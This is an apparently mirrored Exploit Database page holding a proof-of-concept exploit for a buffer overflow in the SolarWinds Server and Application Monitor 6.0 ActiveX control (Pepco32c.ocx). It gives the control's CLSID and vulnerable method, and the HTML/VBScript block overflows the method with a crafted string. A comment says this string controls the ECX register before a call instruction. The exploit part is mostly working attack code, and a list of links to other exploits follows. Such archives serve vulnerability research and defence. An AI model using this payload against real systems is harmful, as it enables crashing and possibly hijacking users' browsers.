SolarWinds Server and Application Monitor – ActiveX ‘Pepco32c’ Buffer Overflow

Exploit Database
12 阅读

作者： blake

日期： 2013-09-22
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/28463/

<html>
<!--
SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow
Vendor: SolarWinds
Version: 6.0
Tested on: Windows 2003 SP2 / IE
Download: http://www.solarwinds.com/downloads/
Author: Blake

CLSID: 8AE9F829-D587-42BB-B5C1-09EE8D9547FA
Path: C:\Program Files\Common Files\SolarWinds\Pepco32c.ocx
Member Name: PEstrarg1
Progid: PEPCO32CLib.Pepco
Safe for Scripting: False
Safe for Initialization: False
Kill Bit: False
-->

<object classid='clsid:8AE9F829-D587-42BB-B5C1-09EE8D9547FA' id='target' ></object>
<script language='vbscript'>

' 132 bytes in we control ecx before the call ecx instruction

buffer = String(132, "A")
ecx = String(4, "B")
junk = String(3086, "C")
arg1 = buffer + ecx + junk

target.PEstrarg1 = arg1

</script>

last Exploits
SolarWinds Server and Application Monitor – ActiveX ‘Pepco32c’ Buffer Overflow的更多信息

Tomabo MP4 Converter 3.25.22 – Denial of Service (PoC)：
Apple Safari – ‘DateTimeFormat.format’ Type Confusion：
Terminal Services Manager 3.2.1 – Denial of Service：
SpotDialup 1.6.7 – ‘Name’ Denial of Service (PoC)：
TP-Link TL-WR741N / TL-WR741ND Routers – Multiple Denial of Service Vulnerabilities：
PixGPS 1.1.8 – Denial of Service (PoC)：
Winamp 5.57 – ‘Browser’ IE Denial of Service：
Drive Power Manager 1.10 – Denial Of Service (PoC)：